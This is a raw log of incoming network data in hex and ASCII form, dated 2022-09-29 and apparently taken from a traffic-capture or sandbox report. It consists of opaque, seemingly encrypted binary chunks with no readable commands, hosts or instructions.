2022-09-29 12:51:24 UTC	1214	IN	Data Raw: ce 87 7e b8 fb 2e f3 71 e1 cc 72 52 53 a0 4f 69 ea c6 49 1f de 61 48 43 fa ea 6b ca 93 c9 cc c0 d4 4c ed cf d5 40 cc 8a 5e 9c 2a 87 3f 20 76 80 01 aa f7 ef c2 57 a5 d1 a5 4f 02 da a1 9c 0c 2a 27 ea 2f 6d fd 11 5e f6 65 51 88 03 06 d2 f1 08 0e f7 a5 6d ae dc 6b d2 5d 8f 06 c2 4f 18 df 31 bd fe 65 08 89 e4 ae 5c c6 c3 83 93 b0 74 4b f3 0b 33 01 4f c6 e5 58 54 f1 c6 22 fe 7e b4 cc 26 fd d4 40 a2 20 ac 31 8c 90 d6 b7 22 69 8a 65 d1 d7 c3 f7 02 62 95 bc 8b 9b 06 ab 4b b1 0d a5 a0 8e 6c 7f 04 78 40 7f 65 3b e3 0c 6b f3 c2 4e 10 5f 91 8f b0 c1 e9 9b 50 b1 a6 1e 57 57 81 89 af ea 0f 2d 0b f5 e7 1f 73 3b 95 fa 70 af fd cd e7 41 ff 1e 02 ae fc 82 9b 92 c7 92 ba 00 54 90 3c 0c b9 1d df f5 48 24 c6 41 fd 2d b4 b2 d8 50 51 a0 04 e5 0c 70 65 5a 44 21 0f 60 e1 b4 81 18 Data Ascii: ~.qrRSOiIaHCkL@^? vWO'/m^eQmk]O1e\tK3OXT"~&@ 1"iebKlx@e;kN_PWW-s;pAT<H$A-PQpeZD!`
2022-09-29 12:51:24 UTC	1230	IN	Data Raw: 23 14 6c 04 46 33 b3 26 f4 19 7f 96 03 c0 17 b3 eb 99 3c 2d 70 92 d9 8c 66 ea 47 1b 34 34 ec 00 b5 9e 98 e6 e7 a5 34 14 de a4 c9 0f a0 ed 92 04 10 77 06 7b 13 2e ed f4 d6 0f e7 f5 f8 bb ab e5 0b 7f 6a 35 95 c6 0c 83 46 8d 38 d9 ea 73 63 31 31 85 b6 0b 43 ca 34 4a 3b 13 3b 54 4a 9c d7 32 5f ee 8f 35 74 7d 14 b0 28 b6 49 5b 84 ca 9a e1 ca 2b ea 05 03 7c 26 3f 6e 31 8e 9f d8 4b 69 68 e3 30 ad e7 c5 fd c1 85 15 d0 35 82 11 95 17 b6 78 3a 97 50 c6 72 73 11 7c e6 61 aa 1d 9a 8d 58 05 46 35 e0 69 60 41 21 5d e2 cc f3 15 b2 4e 87 6f 65 13 90 3e 6e c6 73 36 84 0c d3 3e 1c c2 79 24 96 b1 14 c9 50 20 97 3c d1 3d fb 96 fe da cf 8d 39 e8 5c 04 79 ac 97 fc 0f 2c 0d a0 d2 d2 93 c3 c5 e2 fe 92 d2 54 2d fe 31 4d d7 35 4a 6e d1 17 d4 ca 34 8b f5 51 b4 be 66 7a c6 e5 32 a3 Data Ascii: #lF3&<-pfG444w{.j5F8sc11C4J;;TJ2_5t}(I[+\|&?n1Kih05x:Prs\|aXF5i`A!]Noe>ns6>y$P <=9\y,T-1M5Jn4Qfz2
2022-09-29 12:51:24 UTC	1246	IN	Data Raw: 64 a2 fe 37 9f 15 cb 44 dd f4 9d 67 88 6c c8 d2 c4 c1 17 43 93 ed 1f 16 77 3f dd 94 22 0e 56 18 fa 21 c8 dd ee 56 97 a7 92 d0 6d 43 4c 28 06 23 af 29 a8 51 36 ff 92 0f fe fd 3a 0a 3d f8 b8 3d b8 63 33 06 7e aa 85 6f 0b c3 5b 69 71 0f 28 78 f7 3d 28 c7 94 2a 63 81 59 4b 99 31 9d 3e 9e ef 56 0b 10 71 c4 b0 96 f3 36 97 a5 c5 4a 75 22 e4 da b3 14 c3 fc 90 cd 96 6b 09 b1 ec 42 da a4 0d d8 91 33 93 55 59 60 4d 82 06 6e 51 00 f0 f4 b5 6f 2f 2f a5 52 84 d7 76 7a d4 60 07 1d 6b 3a 0b 9a f1 53 5f 5e 15 ee 9e 60 bd ec 21 3e c7 ed b6 c8 5b 40 a9 4f 97 47 94 66 4b 57 1c a6 96 b3 41 2e d3 f3 b8 48 77 4c 46 a2 39 af 81 85 db 58 d2 89 52 9d b3 a5 3e f7 6a df ed 72 8e 75 99 14 2e 7b 09 df cc d6 17 75 97 63 88 50 27 37 b1 c1 f3 20 6d e6 bb e4 b0 5d b1 4f 0f c8 94 13 12 74 Data Ascii: d7DglCw?"V!VmCL(#)Q6:==c3~o[iq(x=(*cYK1>Vq6Ju"kB3UY`MnQo//Rvz`k:S_^`!>[@OGfKWA.HwLF9XR>jru.{ucP'7 m]Ot
2022-09-29 12:51:24 UTC	1262	IN	Data Raw: 44 63 89 68 92 40 e3 e7 c4 b5 5a f5 fc 7e 03 fc 4f 73 28 eb 43 0c e8 6e d8 aa fb b9 62 ae e9 cc 14 b0 d6 c7 25 c9 13 aa eb 77 5e cc c4 78 72 5f 39 f9 4d e4 03 57 37 05 2d d3 a6 6e cb 64 cf fa da 5c f2 5e 98 49 84 cc 85 f8 cc 4d 00 e8 96 b2 7d 28 df ed 00 22 4c a2 31 e4 1c 39 15 0e 34 65 41 21 57 05 6b 19 c9 32 36 c1 3e f5 22 8b b8 4c 9c 9c dc 20 65 14 6f 8a 27 63 67 79 25 e1 4a f8 ef 1d b3 15 85 bf 5c ed 56 83 da 45 4a df f4 5a 17 9c 47 ad 4e 6c 0e 17 e6 47 60 13 5e 8a 0f 13 b9 b0 42 7b 9f 05 6a 38 53 d5 c3 99 60 34 bb 19 35 4b 7c 11 8b a9 70 4a 13 e8 ec 75 49 8c 2a c7 6b 38 33 c1 b7 e7 b7 a3 64 f8 00 c7 4f b6 d6 08 f8 ef fd 2f a9 11 64 02 b6 39 60 fc 95 7a 07 c2 c3 fe e7 1a b1 bc 86 9a ed 34 aa aa e0 ae ba 68 2c 51 83 9f e1 20 dc 6e b9 fa 8c ab b5 f7 2b Data Ascii: Dch@Z~Os(Cnb%w^xr_9MW7-nd\^IM}("L194eA!Wk26>"L eo'cgy%J\VEJZGNlG`^B{j8S`45K\|pJuI*k83dO/d9`z4h,Q n+
2022-09-29 12:51:24 UTC	1278	IN	Data Raw: 88 0a d4 00 02 da 63 1f 44 f8 90 a0 f2 12 00 73 4b fe aa ed 09 11 3f 2b e2 a4 cf 43 70 6f 2d ba 08 e3 12 79 cd 65 1d c5 e6 c6 49 a1 0e b1 93 28 bb b2 1a 95 31 d3 cd c8 e8 79 17 d8 13 32 65 d2 37 0f ee 2d c8 92 ca c6 c6 ef ae 66 a7 1b 21 c1 6c 34 84 0a 7b 92 4f 9b 15 80 26 d5 2d 68 7a 72 5e e0 c1 0f f1 95 91 fe be ab 0e 2a 13 48 e8 23 5d 51 ad e7 91 fc 30 47 ca a1 17 4d 25 90 59 0e 51 2c 6a 06 d5 eb a5 aa 77 55 e9 f5 6b 48 4d 97 4d 80 e9 8c a1 be 2b 55 05 6f 2d 60 18 85 e2 1a 1b 98 e0 4b 78 6e 4b 15 bd 91 8b 5e 79 b1 00 ca e3 d4 cd 57 bd 63 81 d3 1f 6a f1 2e de b0 6c 03 1f 39 02 29 b0 c4 3f 56 31 d4 6a 88 98 2b 58 6b ad a7 e0 5e 71 ab ee 52 94 d3 cc cd 73 63 87 c9 d9 ad cb db 8d 6a 5e f6 0c cc 01 0f a5 41 d9 7e 37 fe 6a 36 ae f0 4b 0c 23 3a 5e eb 44 2c f5 Data Ascii: cDsK?+Cpo-yeI(1y2e7-f!l4{O&-hzr^*H#]Q0GM%YQ,jwUkHMM+Uo-`KxnK^yWcj.l9)?V1j+Xk^qRscj^A~7j6K#:^D,
2022-09-29 12:51:24 UTC	1294	IN	Data Raw: ff f9 a2 d2 be d8 7f 0a 01 6f 0c 0c 4d 69 7e 3a 92 8c ed 83 5e 58 aa e6 6b 77 ad e9 dd b0 fe c7 2c b4 4b 64 5a 6b a2 84 07 ef e6 ab 7c 34 20 b6 df d1 5a 3e 19 a4 80 0e 64 3b b8 70 ce 58 78 35 38 c0 2b e8 3f 11 fb cd 8b 2c ba b1 7e 61 20 40 7f 74 00 b9 f0 97 e8 c2 ec dd 83 d0 99 70 0f 01 65 aa 50 f4 1a 49 e1 df 71 58 af 46 14 69 07 5d 34 9b a8 b4 8b 94 14 86 97 41 79 60 30 f5 ae ad 7c 6f 07 5f 31 9b d0 ac ca aa 6b c9 29 fd 3f 4b 87 e7 5b 20 c3 42 d3 b1 21 bb ca 28 39 cb da b8 68 b8 35 a8 72 ab 91 f2 bc 25 d5 76 3a 89 0a d8 18 8f 85 df 0a ee 7f c0 47 c2 61 c3 91 c1 13 18 96 8f cb ff dc cf e2 be cf 29 3b 6a 42 90 e0 d9 83 3a 20 93 cb 34 ef 32 07 65 5c be c4 ae f7 9f 42 10 e3 f3 e7 e4 a9 28 f5 47 7f 92 62 aa 63 d2 9f 7a 5a 4b fc aa f6 09 2c 17 1b 16 18 18 19 Data Ascii: oMi~:^Xkw,KdZk\|4 Z>d;pXx58+?,~a @tpePIqXFi]4Ay`0\|o_1k)?K[ B!(9h5r%v:Ga);jB: 42e\B(GbczZK,
2022-09-29 12:51:24 UTC	1310	IN	Data Raw: 42 05 b6 31 83 00 8e 83 a2 23 3a 0f ed d3 77 4a b1 ff d7 48 9f 78 1c f3 96 23 21 23 b6 ae 45 43 a8 2b d1 e1 51 22 85 26 f8 1f e8 a4 29 74 d9 e2 f8 5e 82 5e cb e6 cd ee 00 cb e8 c9 9e 7a 02 77 34 74 bb 79 72 e7 f8 69 2c 47 95 1b b6 dd f1 17 2c 3e 83 8e 2b ac a0 50 a7 ef 02 0b e3 65 1e 1e 76 27 5f 8d 32 e2 1b 1d 01 20 cc 90 e6 7c dd a3 35 ba 8b 9f 67 1d 65 01 fa c5 19 20 c7 63 43 08 c6 8d 6e 0c 28 57 d0 19 8e 59 ea 44 1b d6 82 5b 51 c9 1d b7 b5 49 93 77 6a 4d 47 96 15 a9 6e 14 f1 17 7d 15 02 39 d7 87 fd c7 bc 77 31 0e 93 aa a5 6f 91 1a 66 f4 8f 3c 45 3e 6f 22 d5 80 6f 09 e9 b2 9c 83 70 7e 71 dd 40 5b 52 e1 4c 5d ea dc 4a 41 19 0e 2e e7 03 a9 1c 37 0a 08 71 01 6e 5d 11 4c 68 74 f3 0f da cd fa 7c f2 c7 52 1d 4c 75 dc 9d 4f 5e 11 d0 c0 64 cf 1b 09 76 44 bf bf Data Ascii: B1#:wJHx#!#EC+Q"&)t^^zw4tyri,G,>+Pev'_2 \|5ge cCn(WYD[QIwjMGn}9w1of<E>o"op~q@[RL]JA.7qn]Lht\|RLuO^dvD
2022-09-29 12:51:24 UTC	1326	IN	Data Raw: ab 19 aa ef 3e 03 71 87 df 70 8e 5e 8a 13 66 ea 8e 5e 06 37 a7 f3 9d aa fb df 24 79 33 4b 45 2e 00 07 83 57 21 43 37 9c e9 3f 4b 70 92 84 41 de b0 88 86 1b 23 b0 a3 c1 0b c9 3f 7d 89 d5 17 34 d9 b6 72 c3 44 10 f1 96 c8 62 ef dd d2 57 5c 0d a4 eb 0c 3f d8 f8 32 da ba da f0 b7 43 df 79 40 da 00 82 ec cb 57 6c 70 6c 5c ed 0e 4f 05 1a fd d8 6b 94 58 73 8b 53 f1 35 0c 80 d1 11 7c b8 29 dd a9 0d 8f 13 9c 9c 38 dd c6 ce 74 12 ca aa a1 c4 4f ef 00 22 6d a6 f4 87 3e ee 18 c7 2c 44 2d d2 e1 8f d1 0c 5c e3 c0 1d d1 23 84 10 98 9f a3 ea ec c3 ad ee fa 58 02 5c 19 67 02 1d c2 62 34 1a c4 89 cb f1 3b f9 5e 7a 2d 5f c2 bb 32 a6 56 e7 2f ac a1 27 5c f1 f6 d0 c1 6b ce 47 39 4d dc e2 1e 68 32 1d 8a 3b f9 4e b6 e3 fe e1 04 e6 e2 bf 39 4b 82 52 c1 a7 40 e7 c1 53 6c 46 30 ea Data Ascii: >qp^f^7$y3KE.W!C7?KpA#?}4rDbW\?2Cy@Wlpl\OkXsS5\|)8tO"m>,D-\#X\gb4;^z-_2V/'\kG9Mh2;N9KR@SlF0
2022-09-29 12:51:24 UTC	1342	IN	Data Raw: bf 98 8c f7 e9 d1 db e3 e1 f7 13 e0 93 9d c6 cd b2 f7 7c 20 c6 33 d1 34 40 53 51 99 dd b4 e4 60 87 39 88 dc 4e cd e8 ec de ed 89 8d 16 40 d3 86 86 b1 54 0d 0f c2 a2 f7 bb 37 0c 36 9a 3d 0b 01 22 ee e8 0f 45 e5 64 a0 98 16 fa bb d1 0b 08 86 5c b7 d9 33 df f5 4c 41 ff 7a 6d 12 a5 05 8b 6c 03 7d c5 2e 2e 01 16 be 30 97 2a 0c 7f bc e8 dc d6 77 c7 ee 0f bc f6 11 86 ca 89 d6 e5 ba c3 a7 f0 ae c8 ed 0d 4f 8a 4e f9 bb 8c 7d a7 f4 cf 24 b1 da c7 22 d2 bf d5 56 66 7b fd 51 18 6f 38 b0 f8 dc a1 8a 14 50 c4 d9 3b f6 4b 7d 30 ab 4a 11 1a c0 d6 bd 42 5a 6f ce 76 6c ed b4 a4 05 0d fa b1 e5 14 e6 a8 4a 5e f7 d0 83 06 af 65 7d de c8 fb 06 f4 d9 6e 84 62 d7 57 b0 29 0d ba 3c da 66 b0 bb 28 b0 f9 a7 ca 61 69 74 2e 59 10 cf a8 7a 09 f4 7b 2c ba 8e 7a 89 e7 0c 57 cc ac 33 02 Data Ascii: \| 34@SQ`9N@T76="Ed\3LAzml}..0*wON}$"Vf{Qo8P;K}0JBZovlJ^e}nbW)<f(ait.Yz{,zW3
2022-09-29 12:51:24 UTC	1358	IN	Data Raw: b4 9b 43 db 9e 63 59 e1 33 42 3e 65 81 6b 45 42 67 ff 6b 64 aa b8 67 a3 d2 ec 9d 01 14 64 98 60 f5 58 80 fa c1 2d d5 a1 d5 46 fa cb 03 8e 17 41 03 73 7c 06 2b d8 9f d5 86 f1 43 6d 90 f2 e7 39 1f af 25 9d de 88 5a 8c 89 83 3e 18 da 2d 99 69 3c b5 ea 70 de 8f 67 a1 b4 bd 05 c9 ff 2a 1c 45 eb 9c dd 8d 00 6e 52 5c cb 18 16 d5 78 dc c2 a4 4d c1 a2 3c 9a 0e 09 9a a8 c7 51 4c e3 0a 7f 6e cf 5c 46 13 55 5d d8 6b 0c e6 ec a7 ab 6b 72 7a a8 62 67 da 19 7b 79 20 e0 e6 00 1d a3 a7 88 02 67 78 bd eb ea 36 fe 57 e6 d9 bc f2 37 31 8c b1 00 4f 25 01 4a ea 28 91 3c 8b e7 09 c4 f4 84 34 60 0f 47 87 60 10 a0 b8 f3 dd 40 e7 ab 45 dc cc c0 f1 6f 2b af f4 3f 7c 69 21 48 5a 4b 6a 5b dd 88 75 59 2b e1 ce ef ae 34 51 74 1e 84 af 17 1e f8 70 13 ba bc a7 2a 2c 60 4a d7 7f 0d dd 62 Data Ascii: CcY3B>ekEBgkdgd`X-FAs\|+Cm9%Z>-i<pgEnR\xM<QLn\FU]kkrzbg{y gx6W71O%J(<4`G`@Eo+?\|i!HZKj[uY+4Qtp,`Jb
2022-09-29 12:51:24 UTC	1374	IN	Data Raw: 81 64 c6 48 2e d7 97 72 a9 c5 f4 28 9f 52 29 10 c1 77 86 98 1b 6a 54 eb 36 0d a0 58 96 d5 f1 d1 63 db fa bc 60 f7 8c b8 ba 68 b4 a0 63 e8 74 81 bb e5 a2 2c e9 ee 45 25 df 16 b2 c0 b2 58 4f 78 ae 05 92 a5 32 f3 bf 77 18 5d 9a e3 b9 0f fc 67 c8 a6 85 80 4d ae 66 7e 06 80 9d ce 27 7b 96 06 04 da 52 99 67 2f be 42 0f 97 1a 01 eb 58 a6 ba af c4 8f 88 51 a1 27 98 f7 8f 25 2f 95 01 64 df 3b 4e ca 66 85 85 ff e6 ca d2 20 d7 00 80 0b 9e fc de da 2a ca 17 87 f0 ac ab f3 66 55 c1 1e 79 dd 7c be 9b 1a 3b 36 f9 f9 c6 46 df 29 fc 47 43 b6 85 2b 49 86 79 9e 11 c8 c3 4e 26 47 a8 73 9d 2b 6a ed 70 fc 16 d0 5d 2f fc 7e b3 82 e2 2a a3 0f 15 7a 8f 19 5d db 74 55 29 b5 1e f0 7b c4 7a 09 8b 80 f3 ef ca fd 02 6d 3d 97 f7 bb 19 a6 64 74 f6 15 f2 9e 77 a0 eb d5 c1 03 bf 72 05 8c Data Ascii: dH.r(R)wjT6Xc`hct,E%XOx2w]gMf~'{Rg/BXQ'%/d;Nf fUy\|;6F)GC+IyN&Gs+jp]/~z]tU){zm=dtwr
2022-09-29 12:51:24 UTC	1390	IN	Data Raw: d1 6a 31 03 fd 51 54 99 77 1b 87 0b 76 ba 23 ea ce 14 43 5b 0c 47 ff bb 5e c5 c4 20 1f 46 e5 29 7e fa a1 1b 76 7f bf 8f b7 c9 54 b5 9e f7 ea 74 81 3b e0 00 3f 29 5b 06 f5 8f c6 12 50 46 93 88 4e a9 06 db 0b 22 82 0c 78 6f a5 1e e6 fe 37 a0 77 a7 d2 ad 42 5a 85 4d 42 a6 aa 0d 43 26 ea e5 93 e2 8c 48 58 56 af be f8 7c af 87 66 c8 66 ec c9 1f b0 ac 48 c4 ef b7 38 41 ba 18 43 ff 0b 42 34 2b 96 5a 13 33 78 7e 17 4e 55 a2 7b d8 17 b6 e2 4a 4e cf 40 1e 35 96 6c 75 ca 6d ae 64 fe 75 5e 37 c6 c9 ac d0 74 a8 5e a7 3b 66 d3 ad d3 0e 3b 11 11 1d 6e 7a 0b bd 03 57 2b a4 20 ee ba 0a c1 ff f2 4e 97 d5 52 35 80 12 15 82 4e 3b 75 8e 4c 3b c3 98 1f 76 03 ef 55 42 a9 b3 d2 62 d7 b0 74 2a 2e fd 48 25 c3 ef 62 eb e7 c8 82 f7 1f ed 75 17 0f d3 ea 88 b6 93 ff 23 60 53 f5 63 83 Data Ascii: j1QTwv#C[G^ F)~vTt;?)[PFN"xo7wBZMBC&HXV\|ffH8ACB4+Z3x~NU{JN@5lumdu^7t^;f;nzW+ NR5N;uL;vUBbt*.H%bu#`Sc
2022-09-29 12:51:24 UTC	1406	IN	Data Raw: fc 94 d6 b7 25 80 dd 8c 3d 40 a9 74 93 d3 6b a3 aa 1a 93 62 13 f8 2d 69 6e a5 ff 60 2b a9 38 9d 90 25 0d 2e ab ca f0 30 7a 5a 3a a9 89 df 40 46 88 39 55 21 4e e7 d3 f3 26 26 2c ff d3 3b 55 37 ef 2b 7f ac e9 5d d3 7d 5b f4 77 54 1f 18 0b 75 13 fd 92 e5 da 25 81 9a 21 8c d6 4f b3 1a bb 65 72 79 e5 6f d7 a7 73 10 5f 2f 0c 17 37 9b d7 7d 6c c2 db f1 6f 7f 94 99 c3 a7 20 eb a1 73 d8 95 d0 b0 7e 57 c0 52 00 2f 16 c4 1b 32 06 1f a0 c9 3b 0e 9d 77 0f cd ae 0c 43 cb 35 b7 19 24 b5 1f 4a bb 0b 84 b6 b5 0c a3 bb a1 15 a1 43 ff f2 05 29 3b ef 7c 33 a5 82 1f d3 a9 ac 36 12 d9 bd c9 44 47 68 d6 84 99 a1 99 f9 5a d4 17 62 ab 80 27 84 bc 6e d8 0a 82 ce f5 1c 0a 6b e1 32 ca 09 81 f9 fe 94 a4 25 cd 01 49 41 96 90 88 51 22 bc 4c af ac 84 54 f1 c0 23 f7 93 76 ae c3 5c 22 a1 Data Ascii: %=@tkb-in`+8%.0zZ:@F9U!N&&,;U7+]}[wTu%!Oeryos_/7}lo s~WR/2;wC5$JC);\|36DGhZb'nk2%IAQ"LT#v\"
2022-09-29 12:51:24 UTC	1422	IN	Data Raw: f5 e5 1c 64 f3 82 27 c0 6e ea 89 72 ee 2e 6b 41 75 ed 38 ba fc e8 fa 78 fe da d1 44 eb 1e 98 50 5c 27 ce f4 88 55 6e 68 28 01 65 d1 ce c8 82 57 86 fa bc 3b a5 52 d7 2d a1 46 62 dd 45 6a 1a 96 07 ec c3 47 fb 27 79 7a 43 3a 01 ea a5 88 70 db 24 97 bf f0 ea e9 33 f1 bb 9c a3 01 ee 5d d9 6b 27 e7 74 f4 f0 00 4e dd de eb 2b 70 09 4f ca 4b fd 30 14 2a 47 50 5d 78 dc b5 36 b1 db c3 6e 03 42 f2 95 93 fa d2 d0 b5 16 54 80 83 c1 40 eb 8a f8 31 31 8c b1 60 42 37 2a b5 60 14 e7 ef ea 14 3f 26 b0 a4 87 8f 74 9c 5a d0 cb 2a 44 fb b6 aa 5a 9a 3f b1 c1 37 db b0 0d 2a 49 42 55 fb 06 a8 cf 37 4b e2 73 cf 6b c9 dc b2 a7 77 69 ee d6 31 9a 4a c4 e0 58 8c d6 d4 73 a5 c5 2e 8b 48 8b 62 ff b8 15 50 11 7e 2c 50 8a 06 61 06 17 7b d9 50 6c df 3f 59 70 de c9 48 c7 8f 48 44 b1 d6 da Data Ascii: d'nr.kAu8xDP\'Unh(eW;R-FbEjG'yzC:p$3]k'tN+pOK0GP]x6nBT@11`B7`?&tZDZ?7IBU7Kskwi1JXs.HbP~,Pa{Pl?YpHHD
2022-09-29 12:51:24 UTC	1438	IN	Data Raw: b9 92 36 01 ea d0 20 83 28 5a 2c 07 0b b5 dc e0 0c 1c 5b 0e 43 02 5e fc 8b ee 47 48 6b 4c 13 8e 75 df 17 f4 46 08 c6 fa 35 a9 dc 14 57 a0 6f 0b 70 70 1c 0d fa 6f f5 1a f3 c7 2e 95 0c d8 26 ed e4 74 e5 3b ed 58 0a 68 d9 5c 51 41 88 9a b2 5c 47 b4 9b de 53 d6 7b 59 90 08 0e 41 14 1e 6a 51 b8 f3 d4 71 f2 0e 82 de ed 25 af 96 ad 8b 2d 8f 2b 5d 28 2b 44 e7 e5 e1 8e 7c b5 b2 76 4c 75 98 24 0a d3 b1 95 bf d6 9f ad 2c af 8d bb f3 e8 5a d3 36 6b d0 30 f1 ab 94 5f 03 ec 06 50 d5 c5 16 4c b0 c2 80 60 62 93 b5 b9 3a c7 91 e2 96 99 6b 7e 05 74 cc 74 78 ed 17 4f 96 29 9c 09 ea bf 37 33 6a 48 5b a9 f5 0e 92 d0 47 62 73 2f 22 26 b1 cd 55 94 f4 b9 90 c8 86 67 07 4d cd aa e7 b3 a0 78 c7 70 02 dc b9 ee 33 a7 3d 05 6c ce 6e 55 f0 a5 5c 8d 6d 07 26 b6 86 2b 3b 8c 90 f4 70 4d Data Ascii: 6 (Z,[C^GHkLuF5Woppo.&t;Xh\QA\GS{YAjQq%-+](+D\|vLu$,Z6k0_PL`b:k~ttxO)73jH[Gbs/"&UgMxp3=lnU\m&+;pM
2022-09-29 12:51:24 UTC	1454	IN	Data Raw: 19 0a 60 a9 fb ad 6f d1 95 73 cb d0 df 53 b8 dc 9a 3f ab 90 7f cd 93 1b da e7 44 06 25 ee 78 d4 19 05 bb 67 a7 a8 79 42 89 6e 50 0a 74 27 4e ed 2a 73 64 ec 32 29 4a c4 f4 aa 86 c5 4f 1a 13 a4 f4 fa b4 87 10 0a ac be 3c 62 0b 1b 7e 59 86 65 aa ba 09 bb 41 73 c8 ed c4 87 81 59 37 67 27 66 bd b7 a8 e8 67 ee 5a 98 36 94 de f1 33 fb 58 3b f6 5e ef c2 0a 9c 0a e3 ee 24 eb 6b ad c3 a5 2f 63 da 75 e1 e0 92 15 61 76 a4 5e 55 21 75 eb 6c f7 f5 43 ca d6 37 7e 95 fe 5a 7d 48 5b 7f b6 05 18 e9 79 ff a7 3b 0f 4f 85 21 8b 59 20 1b 24 22 2c c3 df 11 33 bb 46 c4 c0 8d 03 67 34 34 be a4 3a a6 a9 9f 2e f2 24 45 ca 9a f5 fa 80 cc 16 2e e3 7b 44 56 0a f2 00 bd cb c7 8a 85 a5 dc f0 bd 3b 61 ef ac fb 66 73 26 a2 a4 56 71 94 1e f4 73 09 ab 6b 74 20 3c fd d9 1e f3 fc 1f 1c 64 95 Data Ascii: `osS?D%xgyBnPt'N*sd2)JO<b~YeAsY7g'fgZ63X;^$k/cuav^U!ulC7~Z}H[y;O!Y $",3Fg44:.$E.{DV;afs&Vqskt <d
2022-09-29 12:51:24 UTC	1470	IN	Data Raw: 09 8e fc 2a 6a 33 fd 77 ba 31 86 2a d6 c5 49 44 f9 32 25 3a e6 25 6f 12 a3 ca 08 98 df 83 1b c9 f9 02 34 b2 f8 c6 d4 27 28 59 9c ca 06 7f e6 94 1b 33 89 d6 7f a9 db 86 78 01 12 67 50 c4 62 84 04 73 33 c7 80 55 a8 0b a3 59 a6 34 3b 0a 35 2c 4a 36 ce 00 b7 84 b1 c4 2c 77 72 d7 14 20 25 7a 6f af 07 8d b7 df 7a 89 29 1e aa ed 37 bc b2 53 a2 c3 35 08 59 88 ee f7 21 8e 7f fa 3a 54 ab 8a ca c3 12 8d 9b ed 8b dc 66 59 55 07 42 c1 78 aa 9f ee f6 d6 9c 7a f6 76 3d bf 39 bd 8a 61 fe 2e 02 04 4e 97 13 17 66 ba e4 1d c7 f9 59 16 57 b7 69 67 f4 e7 59 96 c6 8d d4 cb 02 11 c0 22 5e bb 47 24 82 66 10 32 a0 f2 1a 1f db 2d f7 2d d5 66 87 08 69 eb 4b 01 0a 5e 20 22 d4 04 23 b8 ca cd 6c b3 f8 6f 09 46 82 41 b8 eb 29 b5 9c 83 b6 1e 32 3a c0 5f b4 cb 4d 27 1e a8 03 73 22 81 b3 Data Ascii: j3w1ID2%:%o4'(Y3xgPbs3UY4;5,J6,wr %zoz)7S5Y!:TfYUBxzv=9a.NfYWigY"^G$f2--fiK^ "#loFA)2:_M's"
2022-09-29 12:51:24 UTC	1486	IN	Data Raw: d3 87 33 2c b6 f5 0d 34 f8 26 8a ee 84 ad f3 38 4f ce 76 65 45 bf 1a 00 12 b4 79 c1 58 4e 5d 76 fa 28 7a 27 fe ed 20 43 eb 72 bf 95 74 de 11 0d 0e 1c e7 f1 96 9a 17 24 a9 a4 db 95 69 11 cb 92 ac 04 0a 28 c6 a6 a1 48 87 de aa 13 fd fd 2d c8 4c 34 91 4f 09 df d6 c7 f2 2c 4d ce 57 9a 0d 5c 17 1b 64 d5 1e 26 92 a4 ca d4 c7 e0 0c c5 c5 8f f8 92 3a a1 88 26 25 3c be ff e2 18 f5 fd d4 34 51 6d 2a e6 22 7d bc 12 76 31 06 54 73 0d 6e 86 c3 1d a3 fe fb 6f 3e a9 d1 c5 00 44 96 03 db be 40 eb 4d 4a fe 56 27 33 9b 2c 05 b7 69 09 b4 ee bf 90 1f ee e5 8e 79 7b 1d 22 58 5d b3 04 52 7a 79 8f e2 fb 23 0d b1 83 e0 2e 37 c2 aa 2a c3 62 c3 7d d9 67 f4 cd 7e 42 ad 4d 79 35 2e b3 ed f4 6e 01 c7 2a 23 1a 6e f5 7f f8 d6 c4 66 3b 71 7d b2 b5 42 92 0c b3 8f 30 63 84 a0 a8 81 d1 86 Data Ascii: 3,4&8OveEyXN]v(z' Crt$i(H-L4O,MW\d&:&%<4Qm"}v1Tsno>D@MJV'3,iy{"X]Rzy#.7b}g~BMy5.n*#nf;q}B0c
2022-09-29 12:51:24 UTC	1502	IN	Data Raw: 66 b7 4f 25 dc bb 3a 66 53 cd ee d4 a3 b8 ff 93 a5 84 aa a7 ea 28 58 7a f0 0b 56 4c d9 fc 40 6c 6e a5 1a 9c 9e f8 66 e5 24 62 b7 63 dc db 89 d4 48 f1 22 c6 10 c7 fb 60 e0 1e cc 98 89 dd ea 34 aa 0c 88 e2 19 28 77 85 e4 4f 1f 9d 11 f0 66 70 5c 5d ec d4 89 94 7b 5f e5 b0 58 82 a1 01 c0 cb 8c 2d aa f1 c9 19 24 32 5a 93 d3 48 25 e4 6c 61 2f 4a e1 a0 d3 7d 28 64 eb bf eb 78 81 fa 22 11 70 46 02 78 a4 2d df ba 5e cd 85 60 84 43 1b 6e 0a f4 6f 04 5d c9 f6 23 84 18 fb 04 ab 19 b2 12 81 4e 17 3d ca d9 62 f6 7a 25 52 4c 09 33 c3 4b 63 90 90 75 6d 83 4d 80 4f b3 99 10 41 93 b7 38 b8 5e e1 4e 48 d8 9c 40 ae 5e a6 af 0b 0b a4 d2 66 0b d5 d8 97 bc dc 10 5d a8 bb 6a 4c 36 62 22 48 f4 e0 c4 bf 9a 54 4e 81 40 6c 1a d5 7b 66 0d ef 73 30 7c 16 ad 0e 7b 5c 25 13 ba 63 34 46 Data Ascii: fO%:fS(XzVL@lnf$bcH"`4(wOfp\]{_X-$2ZH%la/J}(dx"pFx-^`Cno]#N=bz%RL3KcumMOA8^NH@^f]jL6b"HTN@l{fs0\|{\%c4F
2022-09-29 12:51:24 UTC	1518	IN	Data Raw: 2e 42 a9 85 fd ff fe eb 5a e5 e9 bb 8b 12 d8 28 e8 28 59 55 31 10 0f a4 fe 99 70 fc 5f 92 17 cf 2a 82 56 e8 92 da 85 22 62 fd be 05 7f 89 0b cb 1b 80 79 da 09 77 6a c4 80 46 c3 78 46 b2 75 3d ec 0f de 63 74 ea 61 cb 9f 00 0b 3b c0 f7 eb ee 98 d6 8d fd d8 6a a8 12 20 62 85 65 ad c1 83 3d e1 21 73 db f5 4e 6f f2 48 35 7c 49 e3 62 bf c1 ff 2d 15 72 c4 9e 0e 4d 26 ba 1e d7 73 35 a8 ed 40 71 f3 2a 60 84 21 7c bd ef ec f0 b7 60 6a 7d 8e a1 95 06 08 54 d3 cf 31 ad d0 5e a2 1b 60 fd 85 93 62 05 e4 d2 80 8b 02 7c 11 05 7a fa d4 85 cb 37 69 cf 4e 21 2b 06 06 86 a2 22 07 e0 6e b5 5e af 1b 18 09 96 15 e2 bf ea 69 b3 1a ce 02 58 46 58 9e f5 b1 4e df 4c 22 c8 18 0d 84 27 9f ef ca 83 33 9f fd 98 59 8f fd d5 7e c7 1d e0 9c b2 5b 19 b6 4a bc e7 d6 67 51 c4 7b cd 0e 35 c4 Data Ascii: 